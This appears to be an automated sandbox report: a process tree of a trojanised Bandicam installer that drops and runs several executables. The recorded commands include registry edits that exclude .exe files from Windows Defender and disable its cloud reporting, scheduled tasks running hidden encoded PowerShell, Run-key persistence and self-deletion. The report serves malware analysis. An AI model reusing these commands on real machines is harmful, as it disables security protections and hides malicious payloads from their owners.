  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6308 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:8
  2⤵
  PID:1224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5680 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:8
  2⤵
  PID:884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5064 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2760
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=6280 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:1
  2⤵
  PID:1796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=6504 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:1
  2⤵
  PID:4608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=6724 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:1
  2⤵
  PID:1168
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=1016 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:1
  2⤵
  PID:3932
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=5556 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:1
  2⤵
  PID:4136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=6920 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:1
  2⤵
  PID:1156
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=6204 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:1
  2⤵
  PID:4332
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=5912 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:1
  2⤵
  PID:4452
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=6940 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:1
  2⤵
  PID:4120
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=7040 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:1
  2⤵
  PID:5208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=6844 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:1
  2⤵
  PID:5244
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=2432 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:1
  2⤵
  PID:5264

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:60

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3872

C:\Users\Admin\AppData\Local\Temp\Temp1_Bandicam_RjOUEySS.zip\Bandicam_RjOUEySS.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Bandicam_RjOUEySS.zip\Bandicam_RjOUEySS.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:2228
- C:\Users\Admin\AppData\Local\Temp\is-SSUSI.tmp\is-5P4B1.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-SSUSI.tmp\is-5P4B1.tmp" /SL4 $301FC "C:\Users\Admin\AppData\Local\Temp\Temp1_Bandicam_RjOUEySS.zip\Bandicam_RjOUEySS.exe" 4456304 56320
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Suspicious use of SetWindowsHookEx
  PID:2448
- - C:\Windows\SysWOW64\net.exe
    "C:\Windows\system32\net.exe" helpmsg 29
    3⤵
    PID:4844
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 helpmsg 29
      4⤵
      PID:384
- - C:\Program Files (x86)\ImageComparer\IC44.exe
    "C:\Program Files (x86)\ImageComparer\IC44.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:2232
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 900
      4⤵
      Program crash
      PID:2180
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 916
      4⤵
      Program crash
      PID:392
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 144
      4⤵
      Program crash
      PID:4108
- - C:\Program Files (x86)\ImageComparer\IC44.exe
    "C:\Program Files (x86)\ImageComparer\IC44.exe" 4ffd05cb6b3bd7bf3b87552beb826e3d
    3⤵
    - Executes dropped EXE
    - Checks for any installed AV software in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:3160
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 880
      4⤵
      Program crash
      PID:684
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 888
      4⤵
      Program crash
      PID:432
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 972
      4⤵
      Program crash
      PID:5088
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1080
      4⤵
      Program crash
      PID:2236
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1128
      4⤵
      Program crash
      PID:3248
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1108
      4⤵
      Program crash
      PID:5076
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1140
      4⤵
      Program crash
      PID:4312
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1336
      4⤵
      Program crash
      PID:1200
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1344
      4⤵
      Program crash
      PID:1492
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 944
      4⤵
      Program crash
      PID:3900
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 980
      4⤵
      Program crash
      PID:180
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1400
      4⤵
      Program crash
      PID:2316
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1456
      4⤵
      Program crash
      PID:2900
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1388
      4⤵
      Program crash
      PID:3060
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1536
      4⤵
      Program crash
      PID:2628
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1528
      4⤵
      Program crash
      PID:2828
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1204
      4⤵
      Program crash
      PID:3536
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1560
      4⤵
      Program crash
      PID:884
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1204
      4⤵
      Program crash
      PID:2620
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1640
      4⤵
      Program crash
      PID:1908
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1644
      4⤵
      Program crash
      PID:4312
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1648
      4⤵
      Program crash
      PID:3772
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1640
      4⤵
      Program crash
      PID:4892
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1696
      4⤵
      Program crash
      PID:3000
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1676
      4⤵
      Program crash
      PID:3084
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1732
      4⤵
      Program crash
      PID:936
  - - C:\Users\Admin\AppData\Local\Temp\MxZOKcKY\EgKQRibNDk7V.exe
      C:\Users\Admin\AppData\Local\Temp\MxZOKcKY\EgKQRibNDk7V.exe /VERYSILENT
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:4124
    - - C:\Users\Admin\AppData\Local\Temp\is-4IRMV.tmp\is-2T3L9.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-4IRMV.tmp\is-2T3L9.tmp" /SL4 $80326 "C:\Users\Admin\AppData\Local\Temp\MxZOKcKY\EgKQRibNDk7V.exe" 2215905 52736 /VERYSILENT
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of SetWindowsHookEx
        
        PID:2132
      - C:\Windows\SysWOW64\net.exe
        
        "C:\Windows\system32\net.exe" helpmsg 9
        6⤵
        
        PID:2828
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 helpmsg 9
        7⤵
        
        PID:3680
      - C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe
        
        "C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe" install
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5088
      - C:\Windows\SysWOW64\net.exe
        
        "C:\Windows\system32\net.exe" pause Zerkalo331
        6⤵
        
        PID:2072
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 pause Zerkalo331
        7⤵
        
        PID:552
      - C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe
        
        "C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe" start
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of SetWindowsHookEx
        
        PID:4476
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1720
      4⤵
      Program crash
      PID:2900
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1760
      4⤵
      Program crash
      PID:3060
  - - C:\Users\Admin\AppData\Local\Temp\mXzvlto9\3qP1XX.exe
      C:\Users\Admin\AppData\Local\Temp\mXzvlto9\3qP1XX.exe /m SUB=4ffd05cb6b3bd7bf3b87552beb826e3d
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:1444
    - - C:\Users\Admin\AppData\Local\Temp\is-5QKVU.tmp\is-KVFOL.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-5QKVU.tmp\is-KVFOL.tmp" /SL4 $10362 "C:\Users\Admin\AppData\Local\Temp\mXzvlto9\3qP1XX.exe" 1365942 52736 /m SUB=4ffd05cb6b3bd7bf3b87552beb826e3d
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:2620
      - C:\Windows\SysWOW64\net.exe
        
        "C:\Windows\system32\net.exe" helpmsg 24
        6⤵
        
        PID:452
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 helpmsg 24
        7⤵
        
        PID:3876
      - C:\Users\Admin\AppData\Local\Temp\is-IAHR7.tmp\FileDate44\FileDate44.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-IAHR7.tmp\FileDate44\FileDate44.exe" /m SUB=4ffd05cb6b3bd7bf3b87552beb826e3d
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4764
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "FileDate44.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\is-IAHR7.tmp\FileDate44\FileDate44.exe" & exit
        7⤵
        
        PID:4512
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "FileDate44.exe" /f
        8⤵
        Kills process with taskkill
        
        PID:4640
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1808
      4⤵
      Program crash
      PID:3944
  - - C:\Users\Admin\AppData\Local\Temp\pk0jfim3\RrZAYRw1y73jrdza.exe
      C:\Users\Admin\AppData\Local\Temp\pk0jfim3\RrZAYRw1y73jrdza.exe /S /site_id=690689
      4⤵
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Drops file in System32 directory
      Enumerates system info in registry
      Suspicious use of SetWindowsHookEx
      PID:2428
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        5⤵
        
        PID:3976
      - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        6⤵
        
        PID:4044
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        7⤵
        
        PID:5004
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        7⤵
        
        PID:3832
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        5⤵
        
        PID:5040
      - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        6⤵
        
        PID:2732
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        7⤵
        
        PID:2096
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        7⤵
        
        PID:1624
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gUqpbqwbB" /SC once /ST 01:28:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        5⤵
        Creates scheduled task(s)
        
        PID:2316
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gUqpbqwbB"
        5⤵
        
        PID:3248
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gUqpbqwbB"
        5⤵
        
        PID:3808
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bPLWYbEmiNLoeLgDZO" /SC once /ST 02:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\wHhNLFWDcbvPErQrR\WGazEahxDSJaqMe\QcWrpBr.exe\" cw /site_id 690689 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:4972
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1812
      4⤵
      Program crash
      PID:4040
  - - C:\Users\Admin\AppData\Local\Temp\gVyujSlN\5x26G1xfk6ttI6.exe
      C:\Users\Admin\AppData\Local\Temp\gVyujSlN\5x26G1xfk6ttI6.exe /sid=9 /pid=102284 /lid=4ffd05cb6b3bd7bf3b87552beb826e3d
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      PID:4536
    - - C:\Users\Admin\AppData\Roaming\toc\FlKR.exe
        
        C:\Users\Admin\AppData\Roaming\toc\FlKR.exe
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:4496
      - C:\Users\Admin\AppData\Roaming\toc\ZxeJj.exe
        
        "C:\Users\Admin\AppData\Roaming\toc\ZxeJj.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2100
        
        C:\Users\Admin\AppData\Roaming\toc\chromedriver.exe
        
        "C:\Users\Admin\AppData\Roaming\toc\chromedriver.exe" --port=51184
        7⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5060
        
        C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe
        
        "C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe" --allow-pre-commit-input --check-for-update-interval=1800 --disable-background-networking --disable-backgrounding-occluded-windows --disable-client-side-phishing-detection --disable-default-apps --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-blink-features=ShadowDOMV0 --enable-logging --headless --lang=pt --log-level=0 --mute-audio --no-first-run --no-sandbox --no-service-autorun --password-store=basic --remote-debugging-port=9655 --start-maximized --test-type=webdriver --use-mock-keychain --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 12_4; rv:57.0) Gecko/20100101 Firefox/57.0" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\\tocc5fc7fcd-1847-4160-b272-f49f37cc05fe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1224
        
        C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe
        
        C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\tocc5fc7fcd-1847-4160-b272-f49f37cc05fe /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\tocc5fc7fcd-1847-4160-b272-f49f37cc05fe\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=102.0.5005.63 --initial-client-data=0x168,0x16c,0x170,0x164,0x174,0x72dd8518,0x72dd8528,0x72dd8534
        9⤵
        Executes dropped EXE
        
        PID:3352
        
        C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe
        
        "C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --enable-logging --headless --log-level=0 --use-angle=swiftshader-webgl --headless --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 12_4; rv:57.0) Gecko/20100101 Firefox/57.0" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --enable-logging --log-level=0 --mojo-platform-channel-handle=1492 --field-trial-handle=1560,i,4387005303517842973,8377953503100487411,131072 --disable-features=PaintHolding /prefetch:2
        9⤵
        Executes dropped EXE
        
        PID:5016
        
        C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe
        
        "C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=pt-BR --service-sandbox-type=none --no-sandbox --enable-logging --log-level=0 --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --headless --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 12_4; rv:57.0) Gecko/20100101 Firefox/57.0" --enable-logging --log-level=0 --mojo-platform-channel-handle=1668 --field-trial-handle=1560,i,4387005303517842973,8377953503100487411,131072 --disable-features=PaintHolding /prefetch:8
        9⤵
        Executes dropped EXE
        
        PID:3404
        
        C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe
        
        "C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe" --type=renderer --headless --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 12_4; rv:57.0) Gecko/20100101 Firefox/57.0" --lang=pt-BR --no-sandbox --enable-automation --enable-logging --log-level=0 --remote-debugging-port=9655 --test-type=webdriver --allow-pre-commit-input --enable-blink-features=ShadowDOMV0 --lang=pt-BR --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1964 --field-trial-handle=1560,i,4387005303517842973,8377953503100487411,131072 --disable-features=PaintHolding /prefetch:1
        9⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2400
        
        C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe
        
        "C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe" --type=renderer --headless --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 12_4; rv:57.0) Gecko/20100101 Firefox/57.0" --lang=pt-BR --no-sandbox --enable-automation --enable-logging --log-level=0 --remote-debugging-port=9655 --test-type=webdriver --allow-pre-commit-input --disable-gpu-compositing --enable-blink-features=ShadowDOMV0 --lang=pt-BR --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2616 --field-trial-handle=1560,i,4387005303517842973,8377953503100487411,131072 --disable-features=PaintHolding /prefetch:1
        9⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5564
        
        C:\Users\Admin\AppData\Roaming\toc\FlKR.exe
        
        "C:\Users\Admin\AppData\Roaming\toc\FlKR.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5792
        
        C:\Users\Admin\AppData\Roaming\toc\ZxeJj.exe
        
        "C:\Users\Admin\AppData\Roaming\toc\ZxeJj.exe"
        8⤵
        Executes dropped EXE
        
        PID:5648
        
        C:\Users\Admin\AppData\Roaming\toc\chromedriver.exe
        
        "C:\Users\Admin\AppData\Roaming\toc\chromedriver.exe" --port=52875
        9⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1956
        
        C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe
        
        "C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe" --allow-pre-commit-input --check-for-update-interval=1800 --disable-background-networking --disable-backgrounding-occluded-windows --disable-client-side-phishing-detection --disable-default-apps --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-blink-features=ShadowDOMV0 --enable-logging --headless --lang=en --log-level=0 --mute-audio --no-first-run --no-sandbox --no-service-autorun --password-store=basic --remote-debugging-port=9461 --start-maximized --test-type=webdriver --use-mock-keychain --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 12.4; rv:101.0) Gecko/20100101 Firefox/101.0" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\\toc4ca48d47-af6d-4ddc-8c86-920e243f7167"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4332
        
        C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe
        
